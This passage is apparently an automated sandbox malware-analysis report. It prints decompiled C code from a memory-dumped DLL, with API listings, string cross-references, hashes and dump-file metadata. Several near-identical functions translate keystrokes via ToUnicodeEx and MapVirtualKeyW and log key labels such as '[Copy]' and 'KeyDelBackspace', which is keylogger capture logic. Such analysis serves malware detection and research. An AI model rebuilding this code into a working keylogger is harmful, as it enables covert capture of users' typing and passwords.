				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007266
0x10007266
0x1000726d
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[Copy], xrefs: 10007268
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Copy]
API String ID: 783433895-3795801677
Opcode ID: 44d757909d80be684137888da5a970062e875dbb24bf93a2939e8a7e6361997e
Instruction ID: 34291bd968ee6a57f754c6061d72616049048bf9c09e257ad4a1739f3e02d25f
Opcode Fuzzy Hash: 44d757909d80be684137888da5a970062e875dbb24bf93a2939e8a7e6361997e
Instruction Fuzzy Hash: 0D31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007277, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007277(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Finish]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007277
0x10007277
0x1000727e
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Finish], xrefs: 10007279

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Finish]
API String ID: 783433895-126034051
Opcode ID: 692f9ff7583ff38c64fa304b1c97454ce66ce919cf4bbd85751b8f3092655a58
Instruction ID: a0ed5623e56a33cb834bfc176e6fd190eaeae0050e97d100fa21e54e37a1b336
Opcode Fuzzy Hash: 692f9ff7583ff38c64fa304b1c97454ce66ce919cf4bbd85751b8f3092655a58
Instruction Fuzzy Hash: EB31BEB8B042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE458B61

Uniqueness

Uniqueness Score: -1.00%

Function 10007288, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007288(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Reset]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007288
0x10007288
0x1000728f
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Reset], xrefs: 1000728A

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Reset]
API String ID: 783433895-245523249
Opcode ID: 0bc9773a6bbad631a6a70fe1f822373a926ab4f180a8ef66085c0ab71cdd19d9
Instruction ID: 291c1767fd01b166514c41e15e57a47f42bc66d9c0c46ca14ea2eebe3236c6d1
Opcode Fuzzy Hash: 0bc9773a6bbad631a6a70fe1f822373a926ab4f180a8ef66085c0ab71cdd19d9
Instruction Fuzzy Hash: F031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007299, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007299(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Play]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007299
0x10007299
0x100072a0
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Play], xrefs: 1000729B

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Play]
API String ID: 783433895-3392069046
Opcode ID: 7cbc7b547a09e3bc52c6deb3fa975999c833a7782dcd4b422faccb44a12d16fc
Instruction ID: c39f81576484fb7735cad50cf9efa43f524eeb1dbde31a28f4c5d3b5c036a80a
Opcode Fuzzy Hash: 7cbc7b547a09e3bc52c6deb3fa975999c833a7782dcd4b422faccb44a12d16fc
Instruction Fuzzy Hash: 2731C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100072AA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100072AA(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Process]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100072aa
0x100072aa
0x100072b1
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Process], xrefs: 100072AC

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Process]
API String ID: 783433895-2206852380
Opcode ID: 9cc73bee2c5c66c45c57059d7ed4abb569be2cba4b687590c36e796b9dc273c7
Instruction ID: 542da9702f65af167a2acd74eee3d938ae924f742fa8779219d2eac7aa9adbbf
Opcode Fuzzy Hash: 9cc73bee2c5c66c45c57059d7ed4abb569be2cba4b687590c36e796b9dc273c7
Instruction Fuzzy Hash: 3431C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 100072CC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100072CC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Select]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100072cc
0x100072cc
0x100072d3
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6
